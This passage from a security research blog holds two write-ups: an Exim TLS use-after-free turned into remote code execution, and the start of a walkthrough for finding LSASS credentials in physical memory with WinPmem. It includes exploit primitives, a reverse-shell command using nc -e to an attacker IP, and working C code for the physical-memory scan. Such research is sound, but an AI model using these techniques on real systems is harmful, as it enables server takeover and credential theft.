store_reset_3(void *ptr, const char *filename, int linenumber)
{
storeblock * bb;
storeblock * b = current_block[store_pool];
char * bc = CS b + ALIGNED_SIZEOF_STOREBLOCK;
int newlength;

store_last_get[store_pool] = NULL;

if (CS ptr < bc || CS ptr > bc + b->length)
  {
  for (b = chainbase[store_pool]; b; b = b->next)
    {
    bc = CS b + ALIGNED_SIZEOF_STOREBLOCK;
    if (CS ptr >= bc && CS ptr <= bc + b->length) break;
    }
  if (!b)
    log_write(0, LOG_MAIN|LOG_PANIC_DIE, "internal error: store_reset(%p) "
      "failed: pool=%d %-14s %4d", ptr, store_pool, filename, linenumber);
  }


newlength = bc + b->length - CS ptr;

...

(void) VALGRIND_MAKE_MEM_NOACCESS(ptr, newlength);
yield_length[store_pool] = newlength - (newlength % alignment);
next_yield[store_pool] = CS ptr + (newlength % alignment);
current_block[store_pool] = b;


if (yield_length[store_pool] < STOREPOOL_MIN_SIZE &&
    b->next &&
    b->next->length == STORE_BLOCK_SIZE)
  {
  b = b->next;
  
...

  (void) VALGRIND_MAKE_MEM_NOACCESS(CS b + ALIGNED_SIZEOF_STOREBLOCK,
		b->length - ALIGNED_SIZEOF_STOREBLOCK);
  }

bb = b->next;
b->next = NULL;

while ((b = bb))
  {
  
...

  bb = bb->next;
  pool_malloc -= b->length + ALIGNED_SIZEOF_STOREBLOCK;
  store_free_3(b, filename, linenumber);
  }

...

}

Store reset performs a reset / free given a reset point. All subsequent blocks to the block that contains the reset_point will be freed. And finally the yield pointer will be restored within the same block.

BOOL
store_extend_3(void *ptr, int oldsize, int newsize, const char *filename,
  int linenumber)
{
int inc = newsize - oldsize;
int rounded_oldsize = oldsize;

if (rounded_oldsize % alignment != 0)
  rounded_oldsize += alignment - (rounded_oldsize % alignment);

if (CS ptr + rounded_oldsize != CS (next_yield[store_pool]) ||
    inc > yield_length[store_pool] + rounded_oldsize - oldsize)
  return FALSE;

...

if (newsize % alignment != 0) newsize += alignment - (newsize % alignment);
next_yield[store_pool] = CS ptr + newsize;
yield_length[store_pool] -= newsize - rounded_oldsize;
(void) VALGRIND_MAKE_MEM_UNDEFINED(ptr + oldsize, inc);
return TRUE;
}

As we will see later on gstrings, this function tries to extend memory in the same block if there space is available.

Exim gstring’s

Exim uses something called gstrings as a growable string implementation.

This is the structure that defines it:

typedef struct gstring {
   int size;
   int ptr;
   uschar *s;
} gstring;
  • size: string buffer size.
  • ptr: offset to the last character on the string buffer.
  • uschar *s: defines a pointer to the string buffer.

When we want to get a string we can use string_get():

gstring *
string_get(unsigned size)
{
gstring * g = store_get(sizeof(gstring) + size);
g->size = size;
g->ptr = 0;
g->s = US(g + 1);
return g;
}

It uses store_get() to allocate a buffer.

At gstring initialization, the string buffer is right after the struct.

When we want to enter data into the growable string:

gstring *
string_catn(gstring * g, const uschar *s, int count)
{
int p;

if (!g)
  {
  unsigned inc = count < 4096 ? 127 : 1023;
  unsigned size = ((count + inc) &  ~inc) + 1;
  g = string_get(size);
  }

p = g->ptr;
if (p + count >= g->size)
  gstring_grow(g, p, count);

memcpy(g->s + p, s, count);
g->ptr = p + count;
return g;
}

string_catn() checks first if there is enough size, if not, calls gstring_grow().

static void
gstring_grow(gstring * g, int p, int count)
{
int oldsize = g->size;

unsigned inc = oldsize < 4096 ? 127 : 1023;
g->size = ((p + count + inc) & ~inc) + 1;

if (!store_extend(g->s, oldsize, g->size))
  g->s = store_newblock(g->s, g->size, p);
}

It first tries to extend the memory chunk within the same pool block. If failed, then a new block is allocated and the g->s pointer is replaced with the new buffer.

Exim Access Control Lists (ACLs)

Access Control Lists (ACLs) is a type of configuration that allows you to change the behaviour of a server when receiving SMTP commands.

ACLs have been a good way to achieve code execution when exploiting Exim vulnerabilities since a long time.

There is an specific ACL name called run which allows you to run a command.

Sample: ${run{ls -la}}

This specific ACL is the one used when exploiting this vulnerability to execute code remotely.

Root cause

Understanding now how growable strings, the Exim pool allocator and ACL’s work, let’s analyze the root cause of this vulnerability.

In tls-openssl.c, on tls_write():

int
tls_write(void * ct_ctx, const uschar *buff, size_t len, BOOL more)
{
int outbytes, error, left;
SSL * ssl = ct_ctx ? ((exim_openssl_client_tls_ctx *)ct_ctx)->ssl : server_ssl;
static gstring * corked = NULL;

DEBUG(D_tls) debug_printf("%s(%p, %lu%s)\n", __FUNCTION__,
  buff, (unsigned long)len, more ? ", more" : "");

/* Lacking a CORK or MSG_MORE facility (such as GnuTLS has) we copy data when
"more" is notified.  This hack is only ok if small amounts are involved AND only
one stream does it, in one context (i.e. no store reset).  Currently it is used
for the responses to the received SMTP MAIL , RCPT, DATA sequence, only. */
/*XXX + if PIPE_COMMAND, banner & ehlo-resp for smmtp-on-connect. Suspect there's
a store reset there. */

if (!ct_ctx && (more || corked))
  {
#ifdef EXPERIMENTAL_PIPE_CONNECT
  int save_pool = store_pool;
  store_pool = POOL_PERM;
#endif

  corked = string_catn(corked, buff, len);

#ifdef EXPERIMENTAL_PIPE_CONNECT
  store_pool = save_pool;
#endif

  if (more)
    return len;
  buff = CUS corked->s;
  len = corked->ptr;
  corked = NULL;
  }

for (left = len; left > 0;)
  {
  DEBUG(D_tls) debug_printf("SSL_write(%p, %p, %d)\n", ssl, buff, left);
  outbytes = SSL_write(ssl, CS buff, left);
  error = SSL_get_error(ssl, outbytes);
  DEBUG(D_tls) debug_printf("outbytes=%d error=%d\n", outbytes, error);
  switch (error)
    {
    case SSL_ERROR_SSL:
      ERR_error_string_n(ERR_get_error(), ssl_errstring, sizeof(ssl_errstring));
      log_write(0, LOG_MAIN, "TLS error (SSL_write): %s", ssl_errstring);
      return -1;

    case SSL_ERROR_NONE:
      left -= outbytes;
      buff += outbytes;
      break;

    case SSL_ERROR_ZERO_RETURN:
      log_write(0, LOG_MAIN, "SSL channel closed on write");
      return -1;

    case SSL_ERROR_SYSCALL:
      log_write(0, LOG_MAIN, "SSL_write: (from %s) syscall: %s",
	sender_fullhost ? sender_fullhost : US"<unknown>",
	strerror(errno));
      return -1;

    default:
      log_write(0, LOG_MAIN, "SSL_write error %d", error);
      return -1;
    }
  }
return len;
}

This function is the one that send responses to the client when a TLS session is active.

corked is an static pointer, it can be used within different calls.

more with type BOOL is a way to specify if there is more data to buffer or we can return the data to the user.

In case more data needs to be copied, len is returned. Else, corked is NULLed out and the corked->s contents is returned to the client.

This means that we might be able to trigger a Use-After-Free condition in case corked somehow does not get NULLed, and after a call to smtp_reset is performed, the content pointed to by corked will be freed.

If reaching tls_write() again, we will use the buffer after free.

How can we put the server in that situation?

First we initialize a connection to the server, and send EHLO and STARTTLS to start a new TLS Session so we can enter tls_write() on responses.

If we send either RCPT TO or MAIL TO pipelined with a command like NOOP. And we send just a half of the NOOP (NO), and then we close the TLS Session to get back to plaintext to send the other half (OP\n), we will be returning to plaintext and as more = 1 the corked pointer won’t be NULLed.

Now sending a command like EHLO will end up calling smtp_reset(), which will free all the subsequent heap chunks, and retore the yield pointer to reset_point.

On the whole exploitation process we are dealing mostly with the POOL_MAIN pool.

We have a static variable containing a pointer to the middle of a buffer that has been freed. We need to use it to trigger a UAF.

To use it, we need to return to a TLS connection, so we can use tls_write() again.

We send STARTTLS to start a new TLS Session and finally send any command. When the server crafts the response on tls_write(), corked will be used after free.

When I first triggered the bug, a function from OpenSSL lib used my freed buffer and entered binary data, resulting on a SIGSEGV interruption due to an invalid memory address for corked->s:

gef➀  p *corked
$1 = {
  size = 0x54595c9c, 
  ptr = 0xa7e800ba, 
  s = 0x7e35043433160bd3 <error: Cannot access memory at address 0x7e35043433160bd3>
}
gef➀  p corked
$2 = (gstring *) 0x555ad3be1b58
gef➀  

Info leak

Most memory corruption exploits will need nowadays a memory leak to succeed and bypass mitigations like ASLR, PIE and many more.

As mentioned, this Use-After-Free itself allows a remote attacker to retrieve heap pointers.

As the buffer is freed, other functions will start using it, like functions that write heap pointers to the heap.

On responses, NULL bytes are allowed when on a TLS Session. We just need the heap addresses to be leaked be entered in a range of memory from corked->s to corked->s + corked->ptr.

If the address is on that range, it will be returned to the client.

How can we make heap addresses written in that range?

Apart from doing some tests and debugging to see where to move our buffer and how, an interesting trick is pipelining RCPT TO commands together to increase the response buffer string. It will force string_catn() to call gstring_grow(), which will allocate the string buffer somewhere else.

This will help us to overwrite the string buffer but not the gstring struct itself.

Arbitrary Read

Once we have a memory leak, we might start a search of the exim ACL’s, once we identify the address where the ACL is located we can write to it to finally achieve code execution.

To do so, we need to craft somehow an arbitrary read primitive that let us read memory from heap.

Thanks to this Use-After-Free, grooming the heap, we can overwrite the gstring struct, this would allow us to control:

  • corked->size: size of string buffer
  • corked->ptr: offset to last byte written
  • corked->s: pointer to string buffer

Having this, on next tls_write(), arbitrary number of bytes from an arbitrary location will be sent to us when trying to access corked->s.

What about NULLs? They are strings right?

Nope! The responses are returned to the client through SSL_write(), so no problems with NULLs, the limit is corked->ptr which is controlled :).

With this technique we can read any memory we want from heap, so we can iterate over memory blocks until finding the configuration via specific query to search for.

How do I overwrite gstring struct?

First we need to align the heap in such way that we can successfully reuse the target chunk.

In smtp_setup_msg() we depend on the initial reset_point.

To avoid this…reading the handle_smtp_call() we can see there is a way to increase reset_point as initial value on smtp_setup_msg().

  if (!smtp_start_session())
    {
    mac_smtp_fflush();
    search_tidyup();
    _exit(EXIT_SUCCESS);
    }

  for (;;)
    {
    int rc;
    message_id[0] = 0;            /* Clear out any previous message_id */
    reset_point = store_get(0);   /* Save current store high water point */

    DEBUG(D_any)
      debug_printf("Process %d is ready for new message\n", (int)getpid());

    /* Smtp_setup_msg() returns 0 on QUIT or if the call is from an
    unacceptable host or if an ACL "drop" command was triggered, -1 on
    connection lost, and +1 on validly reaching DATA. Receive_msg() almost
    always returns TRUE when smtp_input is true; just retry if no message was
    accepted (can happen for invalid message parameters). However, it can yield
    FALSE if the connection was forcibly dropped by the DATA ACL. */

    if ((rc = smtp_setup_msg()) > 0)
      {
      BOOL ok = receive_msg(FALSE);
      search_tidyup();                    /* Close cached databases */
      if (!ok)                            /* Connection was dropped */
        {
	cancel_cutthrough_connection(TRUE, US"receive dropped");
        mac_smtp_fflush();
        smtp_log_no_mail();               /* Log no mail if configured */
        _exit(EXIT_SUCCESS);
        }
      if (message_id[0] == 0) continue;   /* No message was accepted */
      }
    else
      {
      if (smtp_out)
	{
	int i, fd = fileno(smtp_in);
	uschar buf[128];

	mac_smtp_fflush();
	/* drain socket, for clean TCP FINs */
	if (fcntl(fd, F_SETFL, O_NONBLOCK) == 0)
	  for(i = 16; read(fd, buf, sizeof(buf)) > 0 && i > 0; ) i--;
	}
      cancel_cutthrough_connection(TRUE, US"message setup dropped");
      search_tidyup();
      smtp_log_no_mail();                 /* Log no mail if configured */

      /*XXX should we pause briefly, hoping that the client will be the
      active TCP closer hence get the TCP_WAIT endpoint? */
      DEBUG(D_receive) debug_printf("SMTP>>(close on process exit)\n");
      _exit(rc ? EXIT_FAILURE : EXIT_SUCCESS);
      }

We can see that there is a possibility to return back to smtp_setup_msg() with an increased reset_point.

When reading a message, the return value ok must be true, but we, somehow need to make message_id[0] == 0. This happen on an specific situation.

Let’s read the receive_msg() code:

  /* Handle failure due to a humungously long header section. The >= allows
  for the terminating \n. Add what we have so far onto the headers list so
  that it gets reflected in any error message, and back up the just-read
  character. */

  if (message_size >= header_maxsize)
    {
OVERSIZE:
    next->text[ptr] = 0;
    next->slen = ptr;
    next->type = htype_other;
    next->next = NULL;
    header_last->next = next;
    header_last = next;

    log_write(0, LOG_MAIN, "ridiculously long message header received from "
      "%s (more than %d characters): message abandoned",
      f.sender_host_unknown ? sender_ident : sender_fullhost, header_maxsize);

    if (smtp_input)
      {
      smtp_reply = US"552 Message header is ridiculously long";
      receive_swallow_smtp();
      goto TIDYUP;                             /* Skip to end of function */
      }

    else
      {
      give_local_error(ERRMESS_VLONGHEADER,
        string_sprintf("message header longer than %d characters received: "
         "message not accepted", header_maxsize), US"", error_rc, stdin,
           header_list->next);
      /* Does not return */
      }
    }

If on a message, we send a really long line (no \n’s on it) surpassing header_maxsize, an error happens.

Despite being an error, ok on return is true, but message_id[0] contains 0 :)

This means on handle_smtp_call() we will follow the continue and return back to smtp_setup_msg() with an increased reset_point.

Qualys did the corrupting of the struct with AUTH parameter (part of ESMTP parameters).

It is a good way to overwrite as it allows you to encode binary data as strings with xtext. That string will be decoded as binary data on writing to the allocated buffer.

Though, I did not followed that way. I used the message channel itself to send binary data, and I had no problems with it.

So I was able to overwrite the struct through a message and control all the parameters in the struct.

Write-what-where

We now know the address where the target configuration is stored.

By using the same technique I used for overwriting the target gstring struct, we can do the same but to craft a write-what-where primitive.

This time corked->size must be a high value. corked->ptr must be zero in order to start writing response on corked->s directly.

corked->s will contain the address where we want to write the response of our command triggering the UAF.

Once we overwrite the gstring struct with such values, we need to trigger the Use-After-Free initializing again a TLS Session.

We send an invalid MAIL FROM command so part of our command is returned on the response, which allows us to write arbitrary data.

Achieving Remote Code Execution

ACL is overwritten by our custom command, how do we make it be executed?

Once the ACL is corrupted, in this case I overwrote the ACL corresponding to MAIL FROM commands, we need to make that ACL being interpreted by expand_cstring(). To do so, after the MAIL FROM we used to overwrite the ACL we can pipeline another command (MAIL FROM too as the previous one failed) which will make the ACL being passed to expand_cstring() and the command will finally be executed.

I had a problem with max arguments. I could not nc -e/bin/sh <ip> <port>, just two args were allowed. So I used this as command: /bin/sh -c 'nc -e/bin/sh <ip> <port>'.

Now it won’t give us max_args problem and the command will be executed, resulting on a reverse shell:

RCE_Screenshot

EoF

The full exploit can be found here.

We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.

A physical graffiti of LSASS: getting credentials from physical memory for fun and learning

8 May 2021 at 00:00

Dear Fellowlship, today’s homily is about how one of our owls began his own quest through the lands of physical memory to find the credentials keys to paradise. Please, take a seat and listen to the story.

Prayers at the foot of the Altar a.k.a. disclaimer

Our knowledge about the topic discussed in this article is limited, as we stated in the tittle we did this work just for learning purposes. If you spot incorrections/misconceptions, please ping us at twitter so we can fix it. For a more accurate information (and deep explanations), please check the book β€œWindows Internals” (Pavel Yosifovich, Alex Ionescu, Mark E. Russinovich & David A. Solomon). Also well-known forensic tools are a good source of information (for example Volatility).

Other important thing to keep in mind: the windows version used here is Windows 10 2009 20H2 (October 2020 Update).

Preamble

Hunting for juicy information inside dumps of physical memory is something that regular forensic tools do by default. Even cheaters have been exploring this way in the past to build wallhacks: read physical memory, find your desired game process and look for the player information structs.

From a Red Teaming/Pentesting optics, this approach has been explored too in order to obtain credentials from the lsass process in live machines during engagements. For example, in 2020 F-Secure published an article titled β€œRethinking credential theft” and released a tool called β€œPhysMem2Profit”.

In their article/tool they use WinPmem driver to read physical memory (a vulnerable driver with a read primitive would work too), creating a bridge with sockets between the target machine and the pentester machine, so they can create a minidump of lsass process that is compatible with Mimikatz with the help of Rekall.

Working schema (from 'Rethinking Credential Theft')
Working schema (from 'Rethinking Credential Theft')

The steps they follow are:

  1. Expose the physical memory of the target over a TCP port.
  2. Connect to the TCP port and mount the physical memory as a file.
  3. Analyze the mounted memory with the help of the Rekall framework and create a minidump of LSASS.
  4. Run the minidump through Mimikatz and retrieve credential material.

In our humble opinion, this approach is too convoluted and contains unnecessary steps. Also creating a socket between the two machines does not look fine to us. So… here comes our idea: let’s try to loot lsass from physical memory staying in the same machine and WITHOUT externals tools (like they did with rekall). It is a good opportunity to learn new things!kd

It’s dangerous to go alone! Take this.

As in any quest, we first need a map and a compass to find the treasure because the land of physical memory is dangerous and full of terrors. We can read arbitrary physical memory with WinPem or a driver vulnerable with a read primitive, but… How can we find the process memory? Well, our map is the AVL-tree that contains the VADs info and our compass is the EPROCESS struct. Let’s explain this!

The Memory Manager needs to keep track of which virtual addresses have been reserved in the process’ address space. This information is contained in structs called β€œVAD” (Virtual Address Descriptor) and they are placed inside an AVL-tree (an AVL-tree is a self-balancing binary search tree). The tree is our map: if we find the tree’s first node we can start to walk it and retrieve all the VADs, and consequently we would get the knowledge of how the process memory is distributed (also, the VAD provides more useful information as we are going to see later).

But… how can we find this tree? Well, we need the compass. And our compass is the EPROCESS. This structure contains a pointer to the tree (field VadRoot) and the number of nodes (VadCount):

//0xa40 bytes (sizeof)
struct _EPROCESS
{
    struct _KPROCESS Pcb;                                                   //0x0
    struct _EX_PUSH_LOCK ProcessLock;                                       //0x438
    VOID* UniqueProcessId;                                                  //0x440
    struct _LIST_ENTRY ActiveProcessLinks;                                  //0x448
    struct _EX_RUNDOWN_REF RundownProtect;                                  //0x458
//(...)
    struct _RTL_AVL_TREE VadRoot;                                           //0x7d8
    VOID* VadHint;                                                          //0x7e0
    ULONGLONG VadCount;                                                     //0x7e8
//(...)

Finding this structure in physical memory is easy. In the article β€œCVE-2019-8372: Local Privilege Elevation in LG Kernel Driver”, @Jackson_T uses a mask to find this structure. As we know some data (like the PID, the process name or the Priority value) we can use this as a signature and search the whole physical memory until we match it.

We’ll know the name and PID for each process we’re targeting, so the UniqueProcessId and ImageFileName fields should be good candidates. Problem is that we won’t be able to accurately predict the values for every field between them. Instead, we can define two needles: one that has ImageFileName and another that has UniqueProcessId. We can see that their corresponding byte buffers have predictable outputs. (From Jackson_T post)

So, we can search for our masks and then apply relative offsets to read the fields that we are interested in:

int main(int argc, char** argv) {
    WINPMEM_MEMORY_INFO info;
    DWORD size;
    BOOL result = FALSE;
    int i = 0;
    LARGE_INTEGER large_start;
    DWORD found = 0;


    printf("[+] Getting WinPmem handle...\t");
    pmem_fd = CreateFileA("\\\\.\\pmem",
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL);
    if (pmem_fd == INVALID_HANDLE_VALUE) {
        printf("ERROR!\n");
        return -1;
    }
    printf("OK!\n");

    RtlZeroMemory(&info, sizeof(WINPMEM_MEMORY_INFO));
    printf("[+] Getting memory info...\t");
    result = DeviceIoControl(pmem_fd, IOCTL_GET_INFO,
        NULL, 0, // in
        (char*)&info, sizeof(WINPMEM_MEMORY_INFO), // out
        &size, NULL);
    if (!result) {
        printf("ERROR!\n");
        return -1;
    }
    printf("OK!\n");

    printf("[+] Memory Info:\n");
    printf("\t[-] Total ranges: %lld\n", info.NumberOfRuns.QuadPart);
    for (i = 0; i < info.NumberOfRuns.QuadPart; i++) {
        printf("\t\tStart 0x%08llX - Length 0x%08llx\n", info.Run[i].BaseAddress.QuadPart, info.Run[i].NumberOfBytes.QuadPart);
        max_physical_memory = info.Run[i].BaseAddress.QuadPart + info.Run[i].NumberOfBytes.QuadPart;
    }
    printf("\t[-] Max physical memory 0x%08llx\n", max_physical_memory);

    printf("[+] Scanning memory... ");
    
   
    for (i = 0; i < info.NumberOfRuns.QuadPart; i++) {
        start = info.Run[i].BaseAddress.QuadPart;
        end = info.Run[i].BaseAddress.QuadPart + info.Run[i].NumberOfBytes.QuadPart;

        while (start < end) {
            unsigned char* largebuffer = (unsigned char*)malloc(BUFF_SIZE);
            DWORD to_write = (DWORD)min((BUFF_SIZE), end - start);
            DWORD bytes_read = 0;
            DWORD bytes_written = 0;
            large_start.QuadPart = start;
            result = SetFilePointerEx(pmem_fd, large_start, NULL, FILE_BEGIN);
            if (!result) {
                printf("[!] ERROR! (SetFilePointerEx)\n");
            }
            result = ReadFile(pmem_fd, largebuffer, to_write, &bytes_read, NULL);
            EPROCESS_NEEDLE needle_root_process = {"lsass.exe"};
            
            PBYTE needle_buffer = (PBYTE)malloc(sizeof(EPROCESS_NEEDLE));
            memcpy(needle_buffer, &needle_root_process, sizeof(EPROCESS_NEEDLE));
            int offset = 0;
            offset = memmem((PBYTE)largebuffer, bytes_read, needle_buffer, sizeof(EPROCESS_NEEDLE)); // memmem() is the same used by Jackson_T in his post    
            if (offset >= 0) {
                if (largebuffer[offset + 15] == 2) { //Priority Check
                    if (largebuffer[offset - 0x168] == 0x70 && largebuffer[offset - 0x167] == 0x02) { //PID check, hardcoded for PoC, we can take in runtime but... too lazy :P
                        printf("signature match at 0x%08llx!\n", offset + start);
                        printf("[+] EPROCESS is at 0x%08llx [PHYSICAL]\n", offset - 0x5a8 + start);
                        memcpy(&DirectoryTableBase, largebuffer + offset - 0x5a8 + 0x28, sizeof(ULONGLONG));
                        printf("\t[*] DirectoryTableBase: 0x%08llx\n", DirectoryTableBase);
                        printf("\t[*] VadRoot is at 0x%08llx [PHYSICAL]\n", start + offset - 0x5a8 + 0x7d8);
                        memcpy(&VadRootPointer, largebuffer + offset - 0x5a8 + 0x7d8, sizeof(ULONGLONG));
                        VadRootPointer = VadRootPointer;
                        printf("\t[*] VadRoot points to 0x%08llx [VIRTUAL]\n", VadRootPointer);
                        memcpy(&VadCount, largebuffer + offset - 0x5a8 + 0x7e8, sizeof(ULONGLONG));
                        printf("\t[*] VadCount is %lld\n", VadCount);
                        free(needle_buffer);
                        free(largebuffer);
                        found = 1;
                        break;
                    }
                }
            }

            start += bytes_read;

            free(needle_buffer);
            free(largebuffer);
        }
        if (found != 0) {
            break;
        }
    }
    
	return 0;
}

And here is the ouput:

[+] Getting WinPmem handle...   OK!
[+] Getting memory info...      OK!
[+] Memory Info:
        [-] Total ranges: 4
                Start 0x00001000 - Length 0x0009e000
                Start 0x00100000 - Length 0x00002000
                Start 0x00103000 - Length 0xdfeed000
                Start 0x100000000 - Length 0x20000000
        [-] Max physical memory 0x120000000
[+] Scanning memory... signature match at 0x271c3628!
[+] EPROCESS is at 0x271c3080 [PHYSICAL]
        [*] DirectoryTableBase: 0x29556000
        [*] VadRoot is at 0x271c3858 [PHYSICAL]
        [*] VadRoot points to 0xffffa48bb0147290 [VIRTUAL]
        [*] VadCount is 165

Maybe you are wondering why are we interested in the field DirectoryTableBase. The thing is: from our point of view we only can work with physical memory, we do not β€œunderstand” what a virtual address is because to us they are β€œout of context”. We know about physical memory and offsets, not about virtual addresses bounded to a process. But we are going to deal with pointers to virtual memory so… we need a way to translate them.

Lost in translation

I like to compare virtual addresses with the code used in libraries to know the location of a book, where the first digits indicates the hall, the next the bookshelf, the column and finally the shelf where the book lies.

Our virtual address is in some way just like the library code: it contains different indexes. Instead of talking about halls, columns or shelves, we have Page-Map-Level4 (PML4E), Page-Directory-Pointer (PDPE), Page-Directory (PDE), Page-Table (PTE) and the Page Physical Offset.

From AMD64 Architecture Programmer’s Manual Volume 2.
From AMD64 Architecture Programmer’s Manual Volume 2.

Those are the page levels for a 4KB page, for 2MB we have PML4E, PDPE, PDE and the offset. We can verify this information using kd and the command !vtop with different processes:

For 4KB (Base 0x26631000, virtual adress to translate 0xffffc987034fd330):

lkd> !vtop 26631000 0xffffc987034fd330
Amd64VtoP: Virt ffffc987034fd330, pagedir 0000000026631000
Amd64VtoP: PML4E 0000000026631c98
Amd64VtoP: PDPE 00000000046320e0
Amd64VtoP: PDE 0000000100a1c0d0
Amd64VtoP: PTE 000000001fa3f7e8
Amd64VtoP: Mapped phys 0000000026da8330
Virtual address ffffc987034fd330 translates to physical address 26da8330.

For 2MB (Base 0x1998D000, virtual address to translate 0xffffaa83f4b35640):

lkd> !vtop 1998D000 ffffaa83f4b35640
Amd64VtoP: Virt ffffaa83f4b35640, pagedir 000000001998d000
Amd64VtoP: PML4E 000000001998daa8
Amd64VtoP: PDPE 0000000004631078
Amd64VtoP: PDE 0000000004734d28
Amd64VtoP: Large page mapped phys 0000000108d35640
Virtual address ffffaa83f4b35640 translates to physical address 108d35640.

What is it doing under the hood? Well, the picture of a 4KB page follows this explanation: if you turn the virtual address to its binary representation, you can split it into the indexes of each page level. So, imagine we want to translate the virtual address 0xffffa48bb0147290 and the process page base is 0x29556000 (let’s assume is a 4KB page, later we will explain how to know it).

lkd> .formats ffffa48bb0147290
Evaluate expression:
  Hex:     ffffa48b`b0147290
  Decimal: -100555115171184
  Octal:   1777775110566005071220
  Binary:  11111111 11111111 10100100 10001011 10110000 00010100 01110010 10010000
  Chars:   ......r.
  Time:    ***** Invalid FILETIME
  Float:   low -5.40049e-010 high -1.#QNAN
  Double:  -1.#QNAN

Now we can split the bits in chunks: 12 bits for the Page Physical Offset, 9 for the PTE, 9 for the PDE, 9 for the PDPE and 9 for the PML4E:

1111111111111111 101001001 000101110 110000000 101000111 001010010000

Next we are going to take the chunk for PML4E and multiply by 0x8:

lkd> .formats 0y101001001
Evaluate expression:
  Hex:     00000000`00000149
  Decimal: 329
  Octal:   0000000000000000000511
  Binary:  00000000 00000000 00000000 00000000 00000000 00000000 00000001 01001001
  Chars:   .......I
  Time:    Thu Jan  1 01:05:29 1970
  Float:   low 4.61027e-043 high 0
  Double:  1.62548e-321

0x149 * 0x8 = 0xa48

Now we can use it as an offset: just add this value to the page base (0x29556a48). Next, read the physical memory at that location:

lkd> !dq 29556a48
#29556a48 0a000000`04632863 00000000`00000000
#29556a58 00000000`00000000 00000000`00000000
#29556a68 00000000`00000000 00000000`00000000
#29556a78 00000000`00000000 00000000`00000000
#29556a88 00000000`00000000 00000000`00000000
#29556a98 00000000`00000000 00000000`00000000
#29556aa8 00000000`00000000 00000000`00000000
#29556ab8 00000000`00000000 00000000`00000000

Turn to zero the last 3 numbers, so we have 0x4632000. Now repeat the operation of multiplying the chunk of bits:

kd> .formats 0y000101110
Evaluate expression:
  Hex:     00000000`0000002e
  Decimal: 46
  Octal:   0000000000000000000056
  Binary:  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00101110
  Chars:   ........
  Time:    Thu Jan  1 01:00:46 1970
  Float:   low 6.44597e-044 high 0
  Double:  2.2727e-322

So… 0x4632000 + (0x2e * 0x8) == 0x4632170. Read the physical memory at this point:

lkd> !dq 4632170
# 4632170 0a000000`04735863 00000000`00000000
# 4632180 00000000`00000000 00000000`00000000
# 4632190 00000000`00000000 00000000`00000000
# 46321a0 00000000`00000000 00000000`00000000
# 46321b0 00000000`00000000 00000000`00000000
# 46321c0 00000000`00000000 00000000`00000000
# 46321d0 00000000`00000000 00000000`00000000
# 46321e0 00000000`00000000 00000000`00000000

Just repeat the same operation until the end (except for the last 12 bits, those don’t need to be multiplied by 0x8) and you have successfully translated your virtual address! Don’t trust me? Check it!

kd> !vtop 0x29556000 0xffffa48bb0147290
Amd64VtoP: Virt ffffa48bb0147290, pagedir 0000000029556000
Amd64VtoP: PML4E 0000000029556a48
Amd64VtoP: PDPE 0000000004632170
Amd64VtoP: PDE 0000000004735c00
Amd64VtoP: PTE 0000000022246a38
Amd64VtoP: Mapped phys 000000001645b290
Virtual address ffffa48bb0147290 translates to physical address 1645b290.

Ta-dΓ‘!

Here is a sample function that we are going to use to translate virtual addresses (4KB and 2MB) to physical (ugly as hell, but works):

ULONGLONG v2p(ULONGLONG vaddr) {
    BOOL result = FALSE;
    DWORD bytes_read = 0;
    LARGE_INTEGER PML4E;
    LARGE_INTEGER PDPE;
    LARGE_INTEGER PDE;
    LARGE_INTEGER PTE;
    ULONGLONG SIZE = 0;
    ULONGLONG phyaddr = 0;
    ULONGLONG base = 0;

    base = DirectoryTableBase;

    PML4E.QuadPart = base + extractBits(vaddr, 9, 39) * 0x8;
    //printf("[DEBUG Virtual Address: 0x%08llx]\n", vaddr);
    //printf("\t[*] PML4E: 0x%x\n", PML4E.QuadPart);

    result = SetFilePointerEx(pmem_fd, PML4E, NULL, FILE_BEGIN);
    PDPE.QuadPart = 0;
    result = ReadFile(pmem_fd, &PDPE.QuadPart, 7, &bytes_read, NULL);
    PDPE.QuadPart = extractBits(PDPE.QuadPart, 56, 12) * 0x1000 + extractBits(vaddr, 9, 30) * 0x8;
    //printf("\t[*] PDPE: 0x%08llx\n", PDPE.QuadPart);

    result = SetFilePointerEx(pmem_fd, PDPE, NULL, FILE_BEGIN);
    PDE.QuadPart = 0;
    result = ReadFile(pmem_fd, &PDE.QuadPart, 7, &bytes_read, NULL);
    PDE.QuadPart = extractBits(PDE.QuadPart, 56, 12) * 0x1000 + extractBits(vaddr, 9, 21) * 0x8;
    //printf("\t[*] PDE: 0x%08llx\n", PDE.QuadPart);


    result = SetFilePointerEx(pmem_fd, PDE, NULL, FILE_BEGIN);
    PTE.QuadPart = 0;
    result = ReadFile(pmem_fd, &SIZE, 8, &bytes_read, NULL);
    if (extractBits(SIZE, 1, 63) == 1) {
        result = SetFilePointerEx(pmem_fd, PDE, NULL, FILE_BEGIN);
        result = ReadFile(pmem_fd, &phyaddr, 7, &bytes_read, NULL);
        phyaddr = extractBits(phyaddr, 56, 20) * 0x100000 + extractBits(vaddr, 21, 0);
        //printf("\t[*] Physical Address: 0x%08llx\n", phyaddr);
        return phyaddr;

     }


    result = SetFilePointerEx(pmem_fd, PDE, NULL, FILE_BEGIN);
    PTE.QuadPart = 0;
    result = ReadFile(pmem_fd, &PTE.QuadPart, 7, &bytes_read, NULL);
    PTE.QuadPart = extractBits(PTE.QuadPart, 56, 12) * 0x1000 + extractBits(vaddr, 9, 12) * 0x8;
    //printf("\t[*] PTE: 0x%08llx\n", PTE.QuadPart);

    result = SetFilePointerEx(pmem_fd, PTE, NULL, FILE_BEGIN);
    result = ReadFile(pmem_fd, &phyaddr, 7, &bytes_read, NULL);
    phyaddr = extractBits(phyaddr, 56, 12) * 0x1000 + extractBits(vaddr, 12, 0);
    //printf("\t[*] Physical Address: 0x%08llx\n", phyaddr);
    
    return phyaddr;
}

Well, now we can work with virtual addresses. Let’s move!

Lovin’ Don’t Grow On Trees

The next task to solve is to walk the AVL tree and extract all the VADs. Let’s check the VadRoot pointer:

lkd> dq ffffa48bb0147290
ffffa48b`b0147290  ffffa48b`b0146c50 ffffa48b`b01493b0
ffffa48b`b01472a0  00000000`00000001 ff643ab1`ff643aa0
ffffa48b`b01472b0  00000000`00000707 00000000`00000000
